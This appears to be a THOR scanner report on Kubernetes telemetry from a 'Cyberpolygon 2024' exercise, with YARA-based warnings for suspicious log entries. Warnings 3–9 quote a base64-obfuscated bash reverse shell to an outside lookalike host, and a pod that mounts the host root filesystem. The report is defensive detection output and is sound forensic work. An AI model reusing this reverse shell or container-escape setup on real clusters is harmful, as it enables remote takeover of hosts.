|
|
|
Errors |
---|
Alerts |
---|
Warnings | |
---|---|
Warning 1
|
Sep 10 18:36:35 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Startup
MESSAGE:
32 bit THOR was executed on 64 bit system. For improved results, use the 64 bit version of THOR.
|
Warning 2
|
Sep 10 18:36:35 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Startup
MESSAGE:
Signature file is older than 60 days. Run 'thor-util upgrade' to get new signatures.
|
Warning 3
|
Sep 10 18:39:19 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"AoI_uJEBNKI3r7qcaSwz","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:21.961Z","type":"k8s","event":{"original":"{\"kind\":\"Event\",\"apiVersion\":\"audit.k8s.io/v1\",\"level\":\"RequestResponse\",\"auditID\":\"191ab5a2-2575-4009-a93f-b458ac958b3e\",\"stage\":\"ResponseComplete\",\"requestURI\":\"/api/v1/namespaces/prod/pods/mlops-metrics/status\",\"verb\":\"patch\",\"user\":{\"username\":\"system:node:k8s-node01\",\"groups\":[\"system:nodes\",\"system:authenticated\"]},\"sourceIPs\":[\"10.24.118.57\"],\"userAgent\":\"kubelet/v1.29.8 (linux/amd64) kubernetes/234bc63\",\"objectRef\":{\"resource\":\"pods\",\"namespace\":\"prod\",\"name\":\"mlops-metrics\",\"apiVersion\":\"v1\",\"subresource\":\"status\"},\"responseStatus\":{\"metadata\":{},\"code\":200},\"requestObject\":{\"metadata\":{\"uid\":\"1ab33031-f4eb-47a9-a8ab-af27c89bacbb\"},\"status\":{\"container[...]"args\\\":[\\\"sh\\\",\\\"-c\\\",\\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"],\\\"image\\\":\\\"arunvelsriram/utils\\\",\\[...],\"time\":\"2024-09-03T14:16:48Z\",\"fieldsType\":\"FieldsV1\",\"fieldsV1\":{\"f:metadata\":{\"f:annotations\":{\"f:cni.projectcalico.org/containerID\":{},\"f:cni.projectcalico.org/podIP\":{},\"f:cni.projectcalico.org/podIPs\":{}}}},\"subresource\":\"status\"},{\"manager\":\"kubectl-client-side-apply\",\"operation\":\"Update\",\"apiVersion\":\"v1\",\"time\":\"2024-09-03T14:16:48Z\",\"fieldsType\":\"FieldsV1\",\"fieldsV1\":{\"f:metadata\":{\"f:annotations\":{\".\":{},\"f:kubectl.kubernetes.io/last-applied-configuration\":{}},\"f:labels\":{\".\":{},\"f:app\":{}}},\"f:spec\":{\"f:containers\":{\"k:{\\\"name\\\":\\\"mlops-metrics\\\"}\":{\".\":{},\"f:args\":{},\"f:image\":{},\"f:imagePullPolicy\":{},\"f:name\":{},\"f:resources\":{},\"f:securityContext\":{\".\":{},\"f:runAsUser\":{}},\"f:terminationMessagePath\":{},\"f:terminationMessagePolicy\":{},\"f:volumeMounts\":{\".\":{},\"k:{\\\"mountPath\\\":\\\"/host\\\"}\":{
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators
|
Warning 4
|
Sep 10 18:39:19 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"34I_uJEBNKI3r7qckC81","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:35.965Z","type":"k8s","event":{"original":"{\"kind\":\"Event\",\"apiVersion\":\"audit.k8s.io/v1\",\"level\":\"RequestResponse\",\"auditID\":\"e19bb517-20b7-4c99-8e9f-3daa35b7a341\",\"stage\":\"ResponseComplete\",\"requestURI\":\"/api/v1/namespaces/prod/pods/mlops-metrics/status\",\"verb\":\"patch\",\"user\":{\"username\":\"system:node:k8s-node01\",\"groups\":[\"system:nodes\",\"system:authenticated\"]},\"sourceIPs\":[\"10.24.118.57\"],\"userAgent\":\"kubelet/v1.29.8 (linux/amd64) kubernetes/234bc63\",\"objectRef\":{\"resource\":\"pods\",\"namespace\":\"prod\",\"name\":\"mlops-metrics\",\"apiVersion\":\"v1\",\"subresource\":\"status\"},\"responseStatus\":{\"metadata\":{},\"code\":200},\"requestObject\":{\"metadata\":{\"uid\":\"1ab33031-f4eb-47a9-a8ab-af27c89bacbb\"},\"status\":{\"container[...]"args\\\":[\\\"sh\\\",\\\"-c\\\",\\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"],\\\"image\\\":\\\"arunvelsriram/utils\\\",\\[...]\":\"FieldsV1\",\"fieldsV1\":{\"f:metadata\":{\"f:annotations\":{\"f:cni.projectcalico.org/containerID\":{},\"f:cni.projectcalico.org/podIP\":{},\"f:cni.projectcalico.org/podIPs\":{}}}},\"subresource\":\"status\"},{\"manager\":\"kubectl-client-side-apply\",\"operation\":\"Update\",\"apiVersion\":\"v1\",\"time\":\"2024-09-03T14:16:48Z\",\"fieldsType\":\"FieldsV1\",\"fieldsV1\":{\"f:metadata\":{\"f:annotations\":{\".\":{},\"f:kubectl.kubernetes.io/last-applied-configuration\":{}},\"f:labels\":{\".\":{},\"f:app\":{}}},\"f:spec\":{\"f:containers\":{\"k:{\\\"name\\\":\\\"mlops-metrics\\\"}\":{\".\":{},\"f:args\":{},\"f:image\":{},\"f:imagePullPolicy\":{},\"f:name\":{},\"f:resources\":{},\"f:securityContext\":{\".\":{},\"f:runAsUser\":{}},\"f:terminationMessagePath\":{},\"f:terminationMessagePolicy\":{},\"f:volumeMounts\":{\".\":{},\"k:{\\\"mountPath\\\":\\\"/host\\\"}\":{\".\":{},\"f:mountPath\":{},\"f:name\":{}}}}},\
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators
|
Warning 5
|
Sep 10 18:39:19 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"U4I_uJEBNKI3r7qc3jxh","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:50.154Z","type":"k8s","event":{"original":"{\"process_exec\":{\"process\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4OTk5NTY4NTQ4NTY6MTY2NTE3\", \"pid\":166517, \"uid\":0, \"cwd\":\"/home/utils\", \"binary\":\"/bin/bash\", \"flags\":\"execve clone\", \"start_time\":\"2024-09-03T14:17:48.426919025Z\", \"auid\":4294967295, \"pod\":{\"namespace\":\"prod\", \"name\":\"mlops-metrics\", \"container\":{\"id\":\"cri-o://fdcd66e90be354011d42578ba2f1fd05285c5487627321edd9f5737da5bc669e\", \"name\":\"mlops-metrics\", \"image\":{\"id\":\"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550\", \"name\":\"docker.io/arunvelsriram/utils:latest\"}, \"start_time\":\"2024-09-03T14:17:48Z\", \"pid\":9}, \"pod_labels\":{\"app\":\"mlops-metrics\"}, \"workload\":\"mlops-metrics\", \"workload_kind\":\"Pod\"}, \"docker\":\"fdcd66e90be354011d42578ba2f1fd0\", \"parent_exec_id\":\"azhzLW5vZGUwMTo5NzA4OTk5NTU5MTYyOTA6MTY2NDgw\", \"tid\":166517}, \"pa[...]:\"/bin/sh\", \"arguments\":\"-c \\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"\", \"flags\":\"execve clone\", \"start_time\"[...]/fdcd66e90be354011d42578ba2f1fd05285c5487627321edd9f5737da5bc669e","name":"mlops-metrics","start_time":"2024-09-03T14:17:48Z","pid":9,"image":{"id":"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550","name":"docker.io/arunvelsriram/utils:latest"}},"namespace":"prod","workload":"mlops-metrics"},"exec_id":"azhzLW5vZGUwMTo5NzA4OTk5NTY4NTQ4NTY6MTY2NTE3"},"parent":{"arguments":"-c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","flags":"execve clone","auid":4294967295,"commandline":"/bin/sh -c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","pid":166480,"cwd":"/home/utils","start_t
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators
|
Warning 6
|
Sep 10 18:39:19 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"VoI_uJEBNKI3r7qc3jxh","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:50.154Z","type":"k8s","event":{"original":"{\"process_exec\":{\"process\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4OTk5NTU5MTYyOTA6MTY2NDgw\", \"pid\":166480, \"uid\":0, \"cwd\":\"/home/utils\", \"binary\":\"/bin/sh\", \"arguments\":\"-c \\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"\", \"flags\":\"execve clone\", \"start_time\":\"2024-09-03T14:17:48.425980113Z\", \"auid\":4294967295, \"pod\":{\"namespace\":\"prod\", \"name\":\"mlops-metrics\", \"container\":{\"id\":\"cri-o://fdcd66e90be354011d42578ba2f1fd05285c5487627321edd9f5737da5bc669e\", \"name\":\"mlops-metrics\", \"image\":{\"id\":\"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550\", \"name\":\"docker.io/arunvelsriram/utils:latest\"}, \"start_time\":\"2024-09-03T14:17:48Z\", \"pid\":1}, \"pod_labels\":{\"app\":\"mlops-metrics\"}, \"workload\":\"mlops-metrics\", \"workload_kind\":\"Pod\"}, \"docker\":\"fdcd66e90be354011d42578ba2f1fd0\", \"parent_exec_id\":\"azhzLW5vZGUwMTo5NzA4OTk4ODcyMjIxNTE6MTY2NDY2\", \"tid\":166480}, \"parent\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4OTk4ODcyMjIxNTE6MTY2N[...]4.118.57"]},"tags":["beats_input_codec_plain_applied"],"input":{},"k8s":{"runtime":{"node_name":"k8s-node01","time":"2024-09-03T14:17:48.425980320Z","process_exec":{"process":{"arguments":"-c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","flags":"execve clone","auid":4294967295,"commandline":"/bin/sh -c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","pid":166480,"cwd":"/home/utils","start_time":"2024-09-03T14:17:48.425980113Z","docker":"fdcd66e90be354011d42578ba2f1fd0","parent_exec_id":"azhzLW5vZGUwMTo5NzA4OTk4ODcyMjIxNTE6MTY2NDY2","tid":166480,"uid":0,"binary":"/bin/sh","pod":{"name":"mlops-metrics","workload_kind":"Pod","c
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators
|
Warning 7
|
Sep 10 18:39:19 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"wYI_uJEBNKI3r7qc3jxk","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:50.154Z","type":"k8s","event":{"original":"{\"process_exec\":{\"process\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4OTk5NTg2MTc2NzU6MTY2NTE2\", \"pid\":166516, \"uid\":0, \"cwd\":\"/home/utils\", \"binary\":\"/usr/bin/base64\", \"arguments\":\"-d\", \"flags\":\"execve clone\", \"start_time\":\"2024-09-03T14:17:48.428681947Z\", \"auid\":4294967295, \"pod\":{\"namespace\":\"prod\", \"name\":\"mlops-metrics\", \"container\":{\"id\":\"cri-o://fdcd66e90be354011d42578ba2f1fd05285c5487627321edd9f5737da5bc669e\", \"name\":\"mlops-metrics\", \"image\":{\"id\":\"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550\", \"name\":\"docker.io/arunvelsriram/utils:latest\"}, \"start_time\":\"2024-09-03T14:17:48Z\", \"pid\":8}, \"pod_labels\":{\"app\":\"mlops-metrics\"}, \"workload\":\"mlops-metrics\", \"workload_kind\":\"Pod\"}, \"docker\":\"fdcd66e90be354011d42578ba2f1fd0\", \"parent_exec_id\":\"azhzLW5vZGU[...]:\"/bin/sh\", \"arguments\":\"-c \\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"\", \"flags\":\"execve clone\", \"start_time\"[...]bin/base64","pod":{"name":"mlops-metrics","workload_kind":"Pod","container":{"id":"cri-o://fdcd66e90be354011d42578ba2f1fd05285c5487627321edd9f5737da5bc669e","name":"mlops-metrics","start_time":"2024-09-03T14:17:48Z","pid":8,"image":{"id":"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550","name":"docker.io/arunvelsriram/utils:latest"}},"namespace":"prod","workload":"mlops-metrics"},"exec_id":"azhzLW5vZGUwMTo5NzA4OTk5NTg2MTc2NzU6MTY2NTE2"},"parent":{"arguments":"-c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","flags":"execve clone","auid":4294967295,"commandline":"/bin/sh -c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators
|
Warning 8
|
Sep 10 18:39:19 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"y4I_uJEBNKI3r7qc3jxk","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:49.971Z","type":"k8s","event":{"original":"{\"kind\":\"Event\",\"apiVersion\":\"audit.k8s.io/v1\",\"level\":\"RequestResponse\",\"auditID\":\"1a825c2c-71a2-45df-a947-32d1c33d6f9f\",\"stage\":\"ResponseComplete\",\"requestURI\":\"/api/v1/namespaces/prod/pods/mlops-metrics/status\",\"verb\":\"patch\",\"user\":{\"username\":\"system:node:k8s-node01\",\"groups\":[\"system:nodes\",\"system:authenticated\"]},\"sourceIPs\":[\"10.24.118.57\"],\"userAgent\":\"kubelet/v1.29.8 (linux/amd64) kubernetes/234bc63\",\"objectRef\":{\"resource\":\"pods\",\"namespace\":\"prod\",\"name\":\"mlops-metrics\",\"apiVersion\":\"v1\",\"subresource\":\"status\"},\"responseStatus\":{\"metadata\":{},\"code\":200},\"requestObject\":{\"metadata\":{\"uid\":\"1ab33031-f4eb-47a9-a8ab-af27c89bacbb\"},\"status\":{\"$setEleme[...]"args\\\":[\\\"sh\\\",\\\"-c\\\",\\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"],\\\"image\\\":\\\"arunvelsriram/utils\\\",\\[...]th\\\":\\\"/host\\\",\\\"name\\\":\\\"hostvolume\\\"}]}],\\\"volumes\\\":[{\\\"hostPath\\\":{\\\"path\\\":\\\"/\\\",\\\"type\\\":\\\"Directory\\\"},\\\"name\\\":\\\"hostvolume\\\"}]}}\\n\"},\"managedFields\":[{\"manager\":\"calico\",\"operation\":\"Update\",\"apiVersion\":\"v1\",\"time\":\"2024-09-03T14:16:48Z\",\"fieldsType\":\"FieldsV1\",\"fieldsV1\":{\"f:metadata\":{\"f:annotations\":{\"f:cni.projectcalico.org/containerID\":{},\"f:cni.projectcalico.org/podIP\":{},\"f:cni.projectcalico.org/podIPs\":{}}}},\"subresource\":\"status\"},{\"manager\":\"kubectl-client-side-apply\",\"operation\":\"Update\",\"apiVersion\":\"v1\",\"time\":\"2024-09-03T14:16:48Z\",\"fieldsType\":\"FieldsV1\",\"fieldsV1\":{\"f:metadata\":{\"f:annotations\":{\".\":{},\"f:kubectl.kubernetes.io/last-applied-configuration\":{}},\"f:labels\":{\".\":{},\"f:app\":{}}},\"f:spec\":{\"f:containers\":{\"k:{\\\"name\\\":\\\"mlops-metrics\\\"}\":{\".\"
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators
|
Warning 9
|
Sep 10 18:39:20 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"x4I_uJEBNKI3r7qcaSsw","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:22.150Z","type":"k8s","event":{"original":"{\"process_exec\":{\"process\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4NzE5MzIxNDUwMDY6MTY0NzYw\", \"pid\":164760, \"uid\":0, \"cwd\":\"/home/utils\", \"binary\":\"/bin/sh\", \"arguments\":\"-c \\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"\", \"flags\":\"execve clone\", \"start_time\":\"2024-09-03T14:17:20.402209123Z\", \"auid\":4294967295, \"pod\":{\"namespace\":\"prod\", \"name\":\"mlops-metrics\", \"container\":{\"id\":\"cri-o://11c3efd882aa61732eccba3bdd9d6db3cc4128c22036953fd9609d43620c277b\", \"name\":\"mlops-metrics\", \"image\":{\"id\":\"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550\", \"name\":\"docker.io/arunvelsriram/utils:latest\"}, \"pid\":1}, \"pod_labels\":{\"app\":\"mlops-metrics\"}, \"workload\":\"mlops-metrics\", \"workload_kind\":\"Pod\"}, \"docker\":\"11c3efd882aa61732eccba3bdd9d6db\", \"parent_exec_id\":\"azhzLW5vZGUwMTo5NzA4NzE4NzUyMzc1MDc6MTY0NzQ2\", \"tid\":164760}, \"parent\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4NzE4NzUyMzc1MDc6MTY0NzQ2\", \"pid\":164746, \"uid\":0, \"cwd\"[...]ain_applied"],"input":{},"k8s":{"runtime":{"node_name":"k8s-node01","time":"2024-09-03T14:17:20.402208808Z","process_exec":{"process":{"arguments":"-c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","flags":"execve clone","auid":4294967295,"commandline":"/bin/sh -c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","pid":164760,"cwd":"/home/utils","start_time":"2024-09-03T14:17:20.402209123Z","docker":"11c3efd882aa61732eccba3bdd9d6db","parent_exec_id":"azhzLW5vZGUwMTo5NzA4NzE4NzUyMzc1MDc6MTY0NzQ2","tid":164760,"uid":0,"binary":"/bin/sh","pod":{"name":"mlops-metrics","workload_kind":"Pod","container":{"id":"cri-o://11c3efd882aa6173
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
